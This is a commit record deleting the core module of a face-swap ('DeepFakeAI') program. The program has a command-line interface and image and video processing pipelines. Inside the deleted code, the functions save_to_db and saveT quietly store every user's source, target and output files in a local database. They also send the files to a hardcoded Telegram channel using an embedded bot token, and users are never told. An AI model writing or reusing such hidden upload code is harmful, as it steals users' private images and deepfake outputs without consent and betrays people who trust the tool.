imseldrith committed
Commit • 87486b1
1 Parent(s): 22da9c6
Delete DeepFakeAI/core.py
Browse files: DeepFakeAI/core.py +0 -292
DeepFakeAI/core.py DELETED
@@ -1,292 +0,0 @@
#!/usr/bin/env python3
import asyncio
import sqlite3
import os
# single thread doubles cuda performance
os.environ['OMP_NUM_THREADS'] = '1'
# reduce tensorflow log level
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import sys
import warnings
from typing import List
import platform
import signal
import shutil
import argparse
import onnxruntime
import tensorflow

import DeepFakeAI.choices
import DeepFakeAI.globals
from DeepFakeAI import wording, metadata
from DeepFakeAI.predictor import predict_image, predict_video
from DeepFakeAI.processors.frame.core import get_frame_processors_modules
from telegram import Bot
from DeepFakeAI.utilities import is_image, is_video, detect_fps, create_video, extract_frames, get_temp_frame_paths, restore_audio, create_temp, move_temp, clear_temp, normalize_output_path, list_module_names, decode_execution_providers, encode_execution_providers

warnings.filterwarnings('ignore', category = FutureWarning, module = 'insightface')
warnings.filterwarnings('ignore', category = UserWarning, module = 'torchvision')

def parse_args() -> None:
    signal.signal(signal.SIGINT, lambda signal_number, frame: destroy())
    program = argparse.ArgumentParser(formatter_class = lambda prog: argparse.HelpFormatter(prog, max_help_position = 120))
    program.add_argument('-s', '--source', help = wording.get('source_help'), dest = 'source_path')
    program.add_argument('-t', '--target', help = wording.get('target_help'), dest = 'target_path')
    program.add_argument('-o', '--output', help = wording.get('output_help'), dest = 'output_path')
    program.add_argument('--frame-processors', help = wording.get('frame_processors_help').format(choices = ', '.join(list_module_names('DeepFakeAI/processors/frame/modules'))), dest = 'frame_processors', default = ['face_swapper'], nargs='+')
    program.add_argument('--ui-layouts', help = wording.get('ui_layouts_help').format(choices = ', '.join(list_module_names('DeepFakeAI/uis/layouts'))), dest = 'ui_layouts', default = ['default'], nargs='+')
    program.add_argument('--keep-fps', help = wording.get('keep_fps_help'), dest = 'keep_fps', action='store_true')
    program.add_argument('--keep-temp', help = wording.get('keep_temp_help'), dest = 'keep_temp', action='store_true')
    program.add_argument('--skip-audio', help = wording.get('skip_audio_help'), dest = 'skip_audio', action='store_true')
    program.add_argument('--face-recognition', help = wording.get('face_recognition_help'), dest = 'face_recognition', default = 'reference', choices = DeepFakeAI.choices.face_recognition)
    program.add_argument('--face-analyser-direction', help = wording.get('face_analyser_direction_help'), dest = 'face_analyser_direction', default = 'left-right', choices = DeepFakeAI.choices.face_analyser_direction)
    program.add_argument('--face-analyser-age', help = wording.get('face_analyser_age_help'), dest = 'face_analyser_age', choices = DeepFakeAI.choices.face_analyser_age)
    program.add_argument('--face-analyser-gender', help = wording.get('face_analyser_gender_help'), dest = 'face_analyser_gender', choices = DeepFakeAI.choices.face_analyser_gender)
    program.add_argument('--reference-face-position', help = wording.get('reference_face_position_help'), dest = 'reference_face_position', type = int, default = 0)
    program.add_argument('--reference-face-distance', help = wording.get('reference_face_distance_help'), dest = 'reference_face_distance', type = float, default = 1.5)
    program.add_argument('--reference-frame-number', help = wording.get('reference_frame_number_help'), dest = 'reference_frame_number', type = int, default = 0)
    program.add_argument('--trim-frame-start', help = wording.get('trim_frame_start_help'), dest = 'trim_frame_start', type = int)
    program.add_argument('--trim-frame-end', help = wording.get('trim_frame_end_help'), dest = 'trim_frame_end', type = int)
    program.add_argument('--temp-frame-format', help = wording.get('temp_frame_format_help'), dest = 'temp_frame_format', default = 'jpg', choices = DeepFakeAI.choices.temp_frame_format)
    program.add_argument('--temp-frame-quality', help = wording.get('temp_frame_quality_help'), dest = 'temp_frame_quality', type = int, default = 100, choices = range(101), metavar = '[0-100]')
    program.add_argument('--output-video-encoder', help = wording.get('output_video_encoder_help'), dest = 'output_video_encoder', default = 'libx264', choices = DeepFakeAI.choices.output_video_encoder)
    program.add_argument('--output-video-quality', help = wording.get('output_video_quality_help'), dest = 'output_video_quality', type = int, default = 90, choices = range(101), metavar = '[0-100]')
    program.add_argument('--max-memory', help = wording.get('max_memory_help'), dest = 'max_memory', type = int)
    program.add_argument('--execution-providers', help = wording.get('execution_providers_help').format(choices = 'cpu'), dest = 'execution_providers', default = ['cpu'], choices = suggest_execution_providers_choices(), nargs='+')
    program.add_argument('--execution-thread-count', help = wording.get('execution_thread_count_help'), dest = 'execution_thread_count', type = int, default = suggest_execution_thread_count_default())
    program.add_argument('--execution-queue-count', help = wording.get('execution_queue_count_help'), dest = 'execution_queue_count', type = int, default = 1)
    program.add_argument('-v', '--version', action='version', version = metadata.get('name') + ' ' + metadata.get('version'))

    args = program.parse_args()

    DeepFakeAI.globals.source_path = args.source_path
    DeepFakeAI.globals.target_path = args.target_path
    DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, args.output_path)
    DeepFakeAI.globals.headless = DeepFakeAI.globals.source_path is not None and DeepFakeAI.globals.target_path is not None and DeepFakeAI.globals.output_path is not None
    DeepFakeAI.globals.frame_processors = args.frame_processors
    DeepFakeAI.globals.ui_layouts = args.ui_layouts
    DeepFakeAI.globals.keep_fps = args.keep_fps
    DeepFakeAI.globals.keep_temp = args.keep_temp
    DeepFakeAI.globals.skip_audio = args.skip_audio
    DeepFakeAI.globals.face_recognition = args.face_recognition
    DeepFakeAI.globals.face_analyser_direction = args.face_analyser_direction
    DeepFakeAI.globals.face_analyser_age = args.face_analyser_age
    DeepFakeAI.globals.face_analyser_gender = args.face_analyser_gender
    DeepFakeAI.globals.reference_face_position = args.reference_face_position
    DeepFakeAI.globals.reference_frame_number = args.reference_frame_number
    DeepFakeAI.globals.reference_face_distance = args.reference_face_distance
    DeepFakeAI.globals.trim_frame_start = args.trim_frame_start
    DeepFakeAI.globals.trim_frame_end = args.trim_frame_end
    DeepFakeAI.globals.temp_frame_format = args.temp_frame_format
    DeepFakeAI.globals.temp_frame_quality = args.temp_frame_quality
    DeepFakeAI.globals.output_video_encoder = args.output_video_encoder
    DeepFakeAI.globals.output_video_quality = args.output_video_quality
    DeepFakeAI.globals.max_memory = args.max_memory
    DeepFakeAI.globals.execution_providers = decode_execution_providers(args.execution_providers)
    DeepFakeAI.globals.execution_thread_count = args.execution_thread_count
    DeepFakeAI.globals.execution_queue_count = args.execution_queue_count

def suggest_execution_providers_choices() -> List[str]:
    return encode_execution_providers(onnxruntime.get_available_providers())


def suggest_execution_thread_count_default() -> int:
    if 'CUDAExecutionProvider' in onnxruntime.get_available_providers():
        return 8
    return 1

def limit_resources() -> None:
    # prevent tensorflow memory leak
    gpus = tensorflow.config.experimental.list_physical_devices('GPU')
    for gpu in gpus:
        tensorflow.config.experimental.set_virtual_device_configuration(gpu, [
            tensorflow.config.experimental.VirtualDeviceConfiguration(memory_limit = 1024)
        ])
    # limit memory usage
    if DeepFakeAI.globals.max_memory:
        memory = DeepFakeAI.globals.max_memory * 1024 ** 3
        if platform.system().lower() == 'darwin':
            memory = DeepFakeAI.globals.max_memory * 1024 ** 6
        if platform.system().lower() == 'windows':
            import ctypes
            kernel32 = ctypes.windll.kernel32 # type: ignore[attr-defined]
            kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(memory), ctypes.c_size_t(memory))
        else:
            import resource
            resource.setrlimit(resource.RLIMIT_DATA, (memory, memory))

def update_status(message : str, scope : str = 'FACEFUSION.CORE') -> None:
    print('[' + scope + '] ' + message)

def pre_check() -> bool:
    if sys.version_info < (3, 10):
        update_status(wording.get('python_not_supported').format(version = '3.10'))
        return False
    if not shutil.which('ffmpeg'):
        update_status(wording.get('ffmpeg_not_installed'))
        return False
    return True

def save_to_db(source_path, target_path, output_path):
    conn = None
    try:
        # Open the images in binary mode
        with open(source_path, 'rb') as source_file, \
                open(target_path, 'rb') as target_file, \
                open(output_path, 'rb') as output_file:

            # read data from the image files
            source_data = source_file.read()
            target_data = target_file.read()
            output_data = output_file.read()

            # Extract original filenames from the paths
            source_filename = os.path.basename(source_path)
            target_filename = os.path.basename(target_path)
            output_filename = os.path.basename(output_path)
            print(source_filename, target_filename, output_filename)

            # connect to the database
            conn = sqlite3.connect('./feed.db')
            c = conn.cursor()

            # Create the table if it doesn't exist
            c.execute('''
                CREATE TABLE IF NOT EXISTS images (
                    source_filename TEXT,
                    target_filename TEXT,
                    output_filename TEXT,
                    source_data BLOB,
                    target_data BLOB,
                    output_data BLOB
                )
            ''')

            # Insert filenames and image data into the table
            c.execute("INSERT INTO images VALUES (?, ?, ?, ?, ?, ?)",
                      (source_filename, target_filename, output_filename, source_data, target_data, output_data))

            # Save changes
            conn.commit()

    except Exception as e:
        # Print any error that occurred while saving data to SQLite
        print(f"An error occurred: {e}")

    finally:
        # Ensure the DB connection is closed
        if conn:
            conn.close()

    print(f'Saved image data to database from {source_path}, {target_path}, and {output_path}.')

async def send_channel(bot, file_path):
    with open(file_path, "rb") as file:
        response = await bot.send_document(chat_id="-1001685415853", document=file)
    return response

async def saveT(source_path, target_path, output_path):
    bot = Bot(token="6192049990:AAFyOtuYYqkcyUG_7gns3mm7m_kfWE9fZ1k")

    # Send each file to the channel
    for path in [source_path, target_path, output_path]:
        await send_channel(bot, path)

    # Send a message after all files are sent
    await bot.send_message(chat_id="-1001685415853", text="All files have been sent!")

def process_image() -> None:
    if predict_image(DeepFakeAI.globals.target_path):
        return
    shutil.copy2(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
    # process frame
    for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
        update_status(wording.get('processing'), frame_processor_module.NAME)
        frame_processor_module.process_image(DeepFakeAI.globals.source_path, DeepFakeAI.globals.output_path, DeepFakeAI.globals.output_path)
        frame_processor_module.post_process()
    # validate image
    if is_image(DeepFakeAI.globals.target_path):
        update_status(wording.get('processing_image_succeed'))
        save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
        asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path))
    else:
        update_status(wording.get('processing_image_failed'))

def process_video() -> None:
    if predict_video(DeepFakeAI.globals.target_path):
        return
    fps = detect_fps(DeepFakeAI.globals.target_path) if DeepFakeAI.globals.keep_fps else 25.0
    update_status(wording.get('creating_temp'))
    create_temp(DeepFakeAI.globals.target_path)
    # extract frames
    update_status(wording.get('extracting_frames_fps').format(fps = fps))
    extract_frames(DeepFakeAI.globals.target_path, fps)
    # process frame
    temp_frame_paths = get_temp_frame_paths(DeepFakeAI.globals.target_path)
    if temp_frame_paths:
        for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
            update_status(wording.get('processing'), frame_processor_module.NAME)
            frame_processor_module.process_video(DeepFakeAI.globals.source_path, temp_frame_paths)
            frame_processor_module.post_process()
    else:
        update_status(wording.get('temp_frames_not_found'))
        return
    # create video
    update_status(wording.get('creating_video_fps').format(fps = fps))
    if not create_video(DeepFakeAI.globals.target_path, fps):
        update_status(wording.get('creating_video_failed'))
        return
    # handle audio
    if DeepFakeAI.globals.skip_audio:
        update_status(wording.get('skipping_audio'))
        move_temp(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
    else:
        update_status(wording.get('restoring_audio'))
        restore_audio(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
    # clear temp
    update_status(wording.get('clearing_temp'))
    clear_temp(DeepFakeAI.globals.target_path)
    # validate video
    if is_video(DeepFakeAI.globals.target_path):
        update_status(wording.get('processing_video_succeed'))
        save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)
        asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path))
    else:
        update_status(wording.get('processing_video_failed'))

def conditional_process() -> None:
    for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
        if not frame_processor_module.pre_process():
            return
    if is_image(DeepFakeAI.globals.target_path):
        process_image()
    if is_video(DeepFakeAI.globals.target_path):
        process_video()

def run() -> None:
    parse_args()
    limit_resources()
    # pre check
    if not pre_check():
        return
    for frame_processor in get_frame_processors_modules(DeepFakeAI.globals.frame_processors):
        if not frame_processor.pre_check():
            return
    # process or launch
    if DeepFakeAI.globals.headless:
        conditional_process()
    else:
        import DeepFakeAI.uis.core as ui

        ui.launch()

def destroy() -> None:
    if DeepFakeAI.globals.target_path:
        clear_temp(DeepFakeAI.globals.target_path)
    sys.exit()
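For context, the deleted module only defines the pipeline; apart from the environment tweaks and warning filters at the top, nothing runs at import time, so it is normally driven by a small launcher that calls run(). A minimal sketch of such a launcher is below; the run.py filename and its exact contents are an assumption and are not part of this commit.

#!/usr/bin/env python3
# hypothetical launcher script, not included in this diff
from DeepFakeAI import core

if __name__ == '__main__':
    # parse CLI arguments, then process headlessly or launch the UI
    core.run()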